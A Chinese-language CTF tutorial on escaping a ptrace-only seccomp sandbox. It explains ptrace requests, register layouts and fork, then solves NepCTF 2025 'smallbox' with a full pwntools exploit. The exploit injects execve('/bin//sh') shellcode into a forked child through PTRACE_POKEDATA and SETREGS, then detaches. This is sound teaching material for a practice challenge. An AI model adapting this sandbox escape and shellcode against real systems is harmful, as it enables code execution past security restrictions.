从零开始的 Pwn 之旅 - Ptrace 沙箱

前言

这类题目一般只会允许调用 Ptrace 系统调用

1
2
3
4
5
6
7
8
9
~/P/n/smallbox ❯❯❯ seccomp-tools dump ./smallbox                                                                                                                     (.venv)
[+] please input your shellcode:
ls
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x00 0x01 0x00000065  if (A != ptrace) goto 0003
 0002: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0003: 0x06 0x00 0x00 0x00000000  return KILL

ptrace 系统调用

ptrace 是 Linux 中的一个系统调用,可以让父进程控制子进程运行,并可以检查和改变子进程的内存和寄存器状态。它通常用于调试器和沙箱环境中。

其基本原理是:

  • 当使用了 ptrace 跟踪后,所有发送给被跟踪的子进程的信号(除了SIGKILL),都会被转发给父进程
  • 子进程会被阻塞,这时子进程的状态就会被系统标注为 TASK_TRACED
  • 父进程收到信号后,就可以对停止下来的子进程进行检查和修改,然后让子进程继续运行

gdb 就是使用 ptrace 实现的调试器
一个进程只能同时被一个 ptrace 跟踪
Linux 默认的安全机制(多数发行版启用的 Yama `ptrace_scope = 1`)只允许进程对它自己的子进程(后代进程)执行 ptrace attach

定义:

1
2
#include <sys/ptrace.h>
/* Issue the ptrace request `request` against the process `pid`; the meaning
   of `addr` and `data` depends on the request (see the request list that
   follows). */
long ptrace(enum __ptrace_request request, pid_t pid, void *addr, void *data);
  • request: 指定请求的类型

      1
      2
      3
      4
      5
      6
      7
      8
      9
     10
     11
     12
     13
     14
     15
     16
     17
     18
     19
     20
     21
     22
     23
     24
     25
     26
     27
     28
     29
     30
     31
     32
     33
     34
     35
     36
     37
     38
     39
     40
     41
     42
     43
     44
     45
     46
     47
     48
     49
     50
     51
     52
     53
     54
     55
     56
     57
     58
     59
     60
     61
     62
     63
     64
     65
     66
     67
     68
     69
     70
     71
     72
     73
     74
     75
     76
     77
     78
     79
     80
     81
     82
     83
     84
     85
     86
     87
     88
     89
     90
     91
     92
     93
     94
     95
     96
     97
     98
     99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    
    /* Type of the REQUEST argument to `ptrace'.
       Each enumerator's value is the raw request number, i.e. the number
       a caller passes as the first argument of the call.  The numbering is
       not contiguous (10-11, 20-23 and 27-29 do not appear in this
       listing).  Every enumerator is followed by a macro: requests up to
       PTRACE_SETSIGINFO get a PT_* alias, while those from
       PTRACE_GETREGSET on are defined to themselves (presumably so that
       `#ifdef' can test whether a request is available).  */
    enum __ptrace_request
    {
      /* Indicate that the process making this request should be traced.
         All signals received by this process can be intercepted by its
         parent, and its parent can use the other `ptrace' requests.  */
      PTRACE_TRACEME = 0,
    #define PT_TRACE_ME PTRACE_TRACEME
    
      /* Return the word in the process's text space at address ADDR.  */
      PTRACE_PEEKTEXT = 1,
    #define PT_READ_I PTRACE_PEEKTEXT
    
      /* Return the word in the process's data space at address ADDR.  */
      PTRACE_PEEKDATA = 2,
    #define PT_READ_D PTRACE_PEEKDATA
    
      /* Return the word in the process's user area at offset ADDR.  */
      PTRACE_PEEKUSER = 3,
    #define PT_READ_U PTRACE_PEEKUSER
    
      /* Write the word DATA into the process's text space at address ADDR.  */
      PTRACE_POKETEXT = 4,
    #define PT_WRITE_I PTRACE_POKETEXT
    
      /* Write the word DATA into the process's data space at address ADDR.  */
      PTRACE_POKEDATA = 5,
    #define PT_WRITE_D PTRACE_POKEDATA
    
      /* Write the word DATA into the process's user area at offset ADDR.  */
      PTRACE_POKEUSER = 6,
    #define PT_WRITE_U PTRACE_POKEUSER
    
      /* Continue the process.  */
      PTRACE_CONT = 7,
    #define PT_CONTINUE PTRACE_CONT
    
      /* Kill the process.  */
      PTRACE_KILL = 8,
    #define PT_KILL PTRACE_KILL
    
      /* Single step the process.  */
      PTRACE_SINGLESTEP = 9,
    #define PT_STEP PTRACE_SINGLESTEP
    
      /* Get all general purpose registers used by a process.  */
      PTRACE_GETREGS = 12,
    #define PT_GETREGS PTRACE_GETREGS
    
      /* Set all general purpose registers used by a process.  */
      PTRACE_SETREGS = 13,
    #define PT_SETREGS PTRACE_SETREGS
    
      /* Get all floating point registers used by a process.  */
      PTRACE_GETFPREGS = 14,
    #define PT_GETFPREGS PTRACE_GETFPREGS
    
      /* Set all floating point registers used by a process.  */
      PTRACE_SETFPREGS = 15,
    #define PT_SETFPREGS PTRACE_SETFPREGS
    
      /* Attach to a process that is already running. */
      PTRACE_ATTACH = 16,
    #define PT_ATTACH PTRACE_ATTACH
    
      /* Detach from a process attached to with PTRACE_ATTACH.  */
      PTRACE_DETACH = 17,
    #define PT_DETACH PTRACE_DETACH
    
      /* Get all extended floating point registers used by a process.  */
      PTRACE_GETFPXREGS = 18,
    #define PT_GETFPXREGS PTRACE_GETFPXREGS
    
      /* Set all extended floating point registers used by a process.  */
      PTRACE_SETFPXREGS = 19,
    #define PT_SETFPXREGS PTRACE_SETFPXREGS
    
      /* Continue and stop at the next entry to or return from syscall.  */
      PTRACE_SYSCALL = 24,
    #define PT_SYSCALL PTRACE_SYSCALL
    
      /* Get a TLS entry in the GDT.  */
      PTRACE_GET_THREAD_AREA = 25,
    #define PT_GET_THREAD_AREA PTRACE_GET_THREAD_AREA
    
      /* Change a TLS entry in the GDT.  */
      PTRACE_SET_THREAD_AREA = 26,
    #define PT_SET_THREAD_AREA PTRACE_SET_THREAD_AREA
    
    #ifdef __x86_64__
      /* Access TLS data.  Only declared when compiling for x86-64.  */
      PTRACE_ARCH_PRCTL = 30,
    # define PT_ARCH_PRCTL PTRACE_ARCH_PRCTL
    #endif
    
      /* Continue and stop at the next syscall, it will not be executed.  */
      PTRACE_SYSEMU = 31,
    #define PT_SYSEMU PTRACE_SYSEMU
    
      /* Single step the process, the next syscall will not be executed.  */
      PTRACE_SYSEMU_SINGLESTEP = 32,
    #define PT_SYSEMU_SINGLESTEP PTRACE_SYSEMU_SINGLESTEP
    
      /* Execute process until next taken branch.  */
      PTRACE_SINGLEBLOCK = 33,
    #define PT_STEPBLOCK PTRACE_SINGLEBLOCK
    
      /* Set ptrace filter options.  */
      PTRACE_SETOPTIONS = 0x4200,
    #define PT_SETOPTIONS PTRACE_SETOPTIONS
    
      /* Get last ptrace message.  */
      PTRACE_GETEVENTMSG = 0x4201,
    #define PT_GETEVENTMSG PTRACE_GETEVENTMSG
    
      /* Get siginfo for process.  */
      PTRACE_GETSIGINFO = 0x4202,
    #define PT_GETSIGINFO PTRACE_GETSIGINFO
    
      /* Set new siginfo for process.  */
      PTRACE_SETSIGINFO = 0x4203,
    #define PT_SETSIGINFO PTRACE_SETSIGINFO
    
      /* Get register content.  */
      PTRACE_GETREGSET = 0x4204,
    #define PTRACE_GETREGSET PTRACE_GETREGSET
    
      /* Set register content.  */
      PTRACE_SETREGSET = 0x4205,
    #define PTRACE_SETREGSET PTRACE_SETREGSET
    
      /* Like PTRACE_ATTACH, but do not force tracee to trap and do not affect
         signal or group stop state.  */
      PTRACE_SEIZE = 0x4206,
    #define PTRACE_SEIZE PTRACE_SEIZE
    
      /* Trap seized tracee.  */
      PTRACE_INTERRUPT = 0x4207,
    #define PTRACE_INTERRUPT PTRACE_INTERRUPT
    
      /* Wait for next group event.  */
      PTRACE_LISTEN = 0x4208,
    #define PTRACE_LISTEN PTRACE_LISTEN
    
      /* Retrieve siginfo_t structures without removing signals from a queue.  */
      PTRACE_PEEKSIGINFO = 0x4209,
    #define PTRACE_PEEKSIGINFO PTRACE_PEEKSIGINFO
    
      /* Get the mask of blocked signals.  */
      PTRACE_GETSIGMASK = 0x420a,
    #define PTRACE_GETSIGMASK PTRACE_GETSIGMASK
    
      /* Change the mask of blocked signals.  */
      PTRACE_SETSIGMASK = 0x420b,
    #define PTRACE_SETSIGMASK PTRACE_SETSIGMASK
    
      /* Get seccomp BPF filters.  */
      PTRACE_SECCOMP_GET_FILTER = 0x420c,
    #define PTRACE_SECCOMP_GET_FILTER PTRACE_SECCOMP_GET_FILTER
    
      /* Get seccomp BPF filter metadata.  */
      PTRACE_SECCOMP_GET_METADATA = 0x420d,
    #define PTRACE_SECCOMP_GET_METADATA PTRACE_SECCOMP_GET_METADATA
    
      /* Get information about system call.  */
      PTRACE_GET_SYSCALL_INFO = 0x420e,
    #define PTRACE_GET_SYSCALL_INFO PTRACE_GET_SYSCALL_INFO
    
      /* Get rseq configuration information.  */
      PTRACE_GET_RSEQ_CONFIGURATION = 0x420f,
    #define PTRACE_GET_RSEQ_CONFIGURATION PTRACE_GET_RSEQ_CONFIGURATION
    
      /* Set configuration for syscall user dispatch.  */
      PTRACE_SET_SYSCALL_USER_DISPATCH_CONFIG = 0x4210,
    #define PTRACE_SET_SYSCALL_USER_DISPATCH_CONFIG \
      PTRACE_SET_SYSCALL_USER_DISPATCH_CONFIG
    
      /* Get configuration for syscall user dispatch.  */
      PTRACE_GET_SYSCALL_USER_DISPATCH_CONFIG = 0x4211
    #define PTRACE_GET_SYSCALL_USER_DISPATCH_CONFIG \
      PTRACE_GET_SYSCALL_USER_DISPATCH_CONFIG
    };
  • pid: 被跟踪的进程的 PID

  • addr: 访问的内存地址或寄存器

  • data: 传递的数据

常用示例:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
// Typical call shapes. pid, regs and shellcode are placeholders that are not declared in this snippet.
ptrace(PTRACE_TRACEME, 0, NULL, NULL); // mark the calling process as traceable by its parent
ptrace(PTRACE_PEEKTEXT, pid, (void *)0xDEADC0DE000LL, NULL); // read one word of the child's memory at the given address
ptrace(PTRACE_POKEDATA, pid, (void *)0xDEADC0DE000LL, shellcode); // write ONE word into the child's memory: the data argument itself is the word stored (it is not dereferenced), so a whole shellcode needs one call per word
ptrace(PTRACE_CONT, pid, NULL, NULL); // let the child continue running
ptrace(PTRACE_KILL, pid, NULL, NULL); // kill the child
ptrace(PTRACE_GETREGS, pid, NULL, &regs); // fetch the child's general purpose registers into regs
ptrace(PTRACE_SETREGS, pid, NULL, &regs); // load the child's general purpose registers from regs
ptrace(PTRACE_SYSCALL, pid, NULL, NULL); // continue the child and stop it at the next syscall entry or return
ptrace(PTRACE_SINGLESTEP, pid, NULL, NULL); // single-step the child
ptrace(PTRACE_ATTACH, pid, NULL, NULL); // attach to a process that is already running
ptrace(PTRACE_DETACH, pid, NULL, NULL); // detach from a previously attached process

regs 是一个 struct user_regs_struct 结构体,保存子进程的寄存器状态;调用时把它的地址 &regs 作为 data 参数传入

amd64:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
// amd64 register block exchanged with PTRACE_GETREGS / PTRACE_SETREGS.
// The trailing comment on each field is its byte offset from the start of
// the struct (fields are laid out in 8-byte steps, 27 fields = 0xd8 bytes).
struct user_regs_struct {
    unsigned long r15;        // +0x00
    unsigned long r14;        // +0x08
    unsigned long r13;        // +0x10
    unsigned long r12;        // +0x18
    unsigned long rbp;        // +0x20 (32)
    unsigned long rbx;        // +0x28
    unsigned long r11;        // +0x30
    unsigned long r10;        // +0x38
    unsigned long r9;         // +0x40
    unsigned long r8;         // +0x48
    unsigned long rax;        // +0x50
    unsigned long rcx;        // +0x58
    unsigned long rdx;        // +0x60
    unsigned long rsi;        // +0x68
    unsigned long rdi;        // +0x70
    unsigned long orig_rax;   // +0x78
    unsigned long rip;        // +0x80 (128) instruction pointer
    unsigned long cs;         // +0x88
    unsigned long eflags;     // +0x90
    unsigned long rsp;        // +0x98 (152) stack pointer
    unsigned long ss;         // +0xa0 (160)
    unsigned long fs_base;    // +0xa8
    unsigned long gs_base;    // +0xb0
    unsigned long ds;         // +0xb8
    unsigned long es;         // +0xc0
    unsigned long fs;         // +0xc8
    unsigned long gs;         // +0xd0
};

x86:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
// 32-bit x86 register block, the counterpart of the amd64 layout.
// The trailing comment on each field is its byte offset from the start of
// the struct; the listed offsets advance in 4-byte steps, i.e. they assume
// a 4-byte long (17 fields = 0x44 bytes).
struct user_regs_struct {
    long ebx;         // +0x00
    long ecx;         // +0x04
    long edx;         // +0x08
    long esi;         // +0x0c
    long edi;         // +0x10
    long ebp;         // +0x14
    long eax;         // +0x18
    long xds;         // +0x1c
    long xes;         // +0x20
    long xfs;         // +0x24
    long xgs;         // +0x28
    long orig_eax;    // +0x2c
    long eip;         // +0x30 instruction pointer
    long xcs;         // +0x34
    long eflags;      // +0x38
    long esp;         // +0x3c stack pointer
    long xss;         // +0x40
};

fork 函数

fork 函数用于创建一个新的进程,新的进程是当前进程的副本
它会继承复制父进程的虚拟内存映射结构
也就是说,fork 创建的子进程的 vmmap 与父进程相同;子进程会继承父进程已打开的文件描述符(二者共用同一批打开的文件),其余内容则被复制到各自独立的内存空间中

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
// Create the child process; pid receives fork()'s return value.
pid = fork();
if ( pid < 0 )
{
  // fork failed: report the error and terminate with status 1
  perror("fork");
  exit(1);
}
if ( !pid )
{
  // pid == 0: this branch runs in the child, which spins here forever
  while ( 1 );
}

创建子进程后,子进程会一直执行 while (1); 挂起

特殊的调试手段

当程序被 ptrace 跟踪时, 我们无法使用 gdb 等调试器进行调试

1
2
3
~ ❯❯❯ ps -aux | grep 64512
lhon901    64512 58.0  0.0   2424  1280 pts/3    t+   20:33   3:28 ./smallbox
lhon901    65401  0.0  0.0   9828  6388 pts/5    S+   20:39   0:00 grep --color=auto 64512

STAT 列中的 t 表示该进程处于被跟踪而停止的状态(tracing stop),+ 表示它位于前台进程组

Linux 一切皆文件,我们可以直接通过 /proc/<pid>/maps 读取进程的相关信息

1
2
3
/u/i/sys ❯❯❯ cat /proc/64512/maps # 查看进程的虚拟内存映射

/u/i/sys ❯❯❯ sudo dd if=/proc/64512/mem bs=1 skip=$((0xdeadc0de200)) count=64 2>/dev/null | hexdump -C # 查看某段内存的内容

如果程序被 ptrace 追踪了但是还没有取消追踪时, 可以直接 kill 父进程,此时子进程会直接停止

ptrace attach 之后,被跟踪的进程会收到 SIGSTOP 信号,这时它会停止运行,直到 tracer 让它继续执行(如 PTRACE_CONT)或取消追踪(PTRACE_DETACH)

直接使用 gdb -p <pid> 可以看到停止时的程序切片

例题

NepCtf2025 smallbox

1
2
3
4
5
6
7
8
9
~/P/n/smallbox ❯❯❯ seccomp-tools dump ./smallbox                                                                                                                     (.venv)
[+] please input your shellcode:
ls
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x00 0x01 0x00000065  if (A != ptrace) goto 0003
 0002: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0003: 0x06 0x00 0x00 0x00000000  return KILL
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
/* Entry point of the smallbox challenge (decompiler pseudo-code, not
   compilable C as-is).
   Maps a page at the fixed address 0xDEADC0DE000, forks a child that spins
   forever, then - in the parent only - reads up to 0x1000 bytes from stdin
   into the page, installs the seccomp filter and calls the page.
   Returns 0 if the called code returns, 1 when the mapping fails; exits
   with status 1 when fork fails. */
int __fastcall main(int argc, const char **argv, const char **envp)
{
  pid_t pid; // [rsp+4h] [rbp-Ch]  stack slot of pid: the payload reads the child's pid back from [rbp-0xc]

  // disable buffering on the standard streams
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  // prot 7 = read|write|execute; flags 50 = 0x32, which on Linux x86-64 is
  // MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS. The result must be exactly the
  // requested address, otherwise the else branch reports the failure.
  if ( mmap((void *)0xDEADC0DE000LL, 0x1000u, 7, 50, -1, 0) == (void *)0xDEADC0DE000LL )
  {
    puts("[+] please input your shellcode: ");
    pid = fork();
    if ( pid < 0 )
    {
      perror("fork");
      exit(1);
    }
    if ( !pid )
    {
      // child: spins forever and never reaches install_seccomp() below,
      // so the filter is only installed in the parent
      while ( 1 )
        ;
    }
    // parent only from here on: load the user-supplied code into the page
    read(0, (void *)0xDEADC0DE000LL, 0x1000u);
    // defined elsewhere; per the seccomp-tools dump in this write-up the
    // filter allows only the ptrace syscall
    install_seccomp();
    // decompiler notation for an indirect call to address 0xDEADC0DE000
    MEMORY[0xDEADC0DE000]();
    return 0;
  }
  else
  {
    perror("mmap");
    return 1;
  }
}

程序首先 mmap 了一段可读可写可执行的区域
使用 fork 函数创建了子进程,子进程永远挂起执行 while (1);
读取我们的输入到 mmap 区域
装载沙箱
执行 mmap 区域的 shellcode


可以注意到的是, fork 出来的子进程是没有沙箱的,所以我们可以通过 ptrace 改写子进程的内存和 RIP 寄存器
从而达到执行 shellcode 的目的

payload:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
# Exploit for NepCTF 2025 "smallbox". The parent may only issue ptrace
# (syscall number 101), so the shellcode it runs uses ptrace to write an
# execve("/bin//sh") payload into the forked child and to point the child's
# rip at that payload.
from pwn import *

# p = process("./smallbox")
p = remote("nepctf32-hjwc-ywqj-phqe-67dnypvso470.nepctf.com", 443, ssl=True)
context.terminal = ["kitty", "@", "launch", "--type=window"]
context.arch = "amd64"

# fixed address of the page mapped by the challenge binary
mmap_addr = 0xDEADC0DE000

# 1. PTRACE_ATTACH (request 16)
# Register use for every ptrace syscall below: rax = 101 (ptrace),
# rdi = request, rsi = pid, rdx = addr, r10 = data.
# The child's pid is read from [rbp-0xc], the slot of main's local `pid`;
# this assumes rbp still holds main's frame pointer when the shellcode runs.
sc = """
mov rax, 101
mov rdi, 16
mov esi, DWORD ptr [rbp-0xc]
mov rdx, 0
mov r10, 0
syscall
"""

# shellcode = asm(shellcraft.sh())
# https://www.exploit-db.com/exploits/36858
# 23-byte execve("/bin//sh") payload that will run inside the child
shellcode = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"

# 2. PTRACE_POKEDATA (request 5)
# POKEDATA stores one word per call, so the payload is split into 8-byte
# chunks (the last one zero-padded), each encoded as a little-endian integer
# and written to the child at mmap_addr + 0x200 + i.
# A busy-wait loop precedes every write.
# NOTE(review): presumably the wait gives the child time to actually stop
# after PTRACE_ATTACH, since the seccomp filter leaves no wait/sleep syscall
# available - confirm whether the later iterations need it at all.
for i in range(0, len(shellcode), 8):
    chunk = shellcode[i : i + 8]
    chunk += b"\x00" * (8 - len(chunk))
    chunk_val = int.from_bytes(chunk, "little")
    addr = mmap_addr + 0x200 + i
    sc += f"""
    mov rcx, 1000000000
delay_loop_{i}:
    dec rcx
    jnz delay_loop_{i}
    mov rax, 101
    mov rdi, 5
    mov esi, DWORD PTR [rbp-0xc]
    mov rdx, {addr}
    mov r10, {chunk_val}
    syscall
    """


# 3. PTRACE_GETREGS (request 12) - disabled, kept for reference
# sc += f"""
# mov rax, 101
# mov rdi, 12
# mov esi, DWORD ptr [rbp-0xc]
# mov rdx, 0
# mov r10, {mmap_addr + 0x200}
# syscall
# """

# 4. PTRACE_SETREGS (request 13)
# The data argument points at mmap_addr + 0x600 in the parent's memory, where
# the input sent below places a fake user_regs_struct.
# x86_64 offsets inside that struct: rip = 128 (0x80), rsp = 152 (0x98),
# rbp = 32 (0x20); only the rip slot is filled in by this exploit.
sc += f"""
mov rax, 101
mov rdi, 13
mov esi, DWORD PTR [rbp-0xc]
mov rdx, 0
mov r10, {mmap_addr + 0x600}
syscall
"""

# 5. PTRACE_CONT (request 7) - disabled, the detach below is used instead
# sc += """
# mov rax, 101
# mov rdi, 7
# mov esi, DWORD PTR [rbp-0xc]
# mov rdx, 0
# mov r10, 0
# syscall
# """

# PTRACE_DETACH (request 17): release the child so it runs on from the new rip
sc += """
mov rax, 101
mov rdi, 17
mov esi, DWORD PTR [rbp-0xc]
xor rdx, rdx
xor r10, r10
syscall
"""

# park the parent in an infinite loop instead of running past the shellcode
sc += "jmp $"

# the assembled code must end before offset 0x200
assert len(asm(sc)) < 0x200, f"Shellcode too large! ({len(asm(sc))} bytes)"

# Zero-pad up to offset 0x600 + 128, i.e. the rip slot of the fake register
# block at mmap_addr + 0x600, and store the payload address there.
# NOTE(review): every other field of the fake block (rsp, cs, ss, ...) is
# left as zero - confirm how the kernel handles that in PTRACE_SETREGS.
sc = asm(sc).ljust(0x600 + 128, b"\x00") + p64(mmap_addr + 0x200)  # fake regs.rip
# gdb.attach(p)
# pause()
p.recvuntil(b"please input your shellcode:")
p.send(sc)

p.interactive()

# flag: NepCTF2025{c16e9c91-e15d-2f25-267a-ae6a5f9f3dc1}

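PTRACE_ATTACH 只是向子进程发送 SIGSTOP,调用返回时子进程不一定已经停下;而 PTRACE_POKEDATA 等请求要求目标进程处于停止状态,否则会失败(ESRCH),所以 attach 之后不能立刻写入,需要先加入延迟
正常情况下应当用 waitpid 等待子进程停止,但沙箱只允许 ptrace,也不能使用 sleep 等调用,因此我们使用了一个简单的循环来实现延迟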

1
2
3
4
mov rcx, 1000000000
delay_loop_{i}:
    dec rcx
    jnz delay_loop_{i}

Github Copilot 给出的解释(仅供参考,未经验证;更直接的原因是 PTRACE_ATTACH 之后子进程尚未真正停下,此时的 ptrace 请求会失败):

1
2
3
4
内核调度与信号竞争
    ptrace 本质是进程间的“调试协议”,每次 POKEDATA 都会产生进程状态切换(如目标进程被 STOP,写入后再 CONT)。
    如果 tracer 进程连续高速写入,目标进程来不及响应和切换状态,导致写入操作覆盖或丢失。
    某些场景下,目标进程可能还在运行其它代码导致写入区被修改或复用。

程序最后要加入 jmp $,否则父进程在执行完 shellcode 后会继续往下执行并退出,导致子进程后续无法正确地 getshell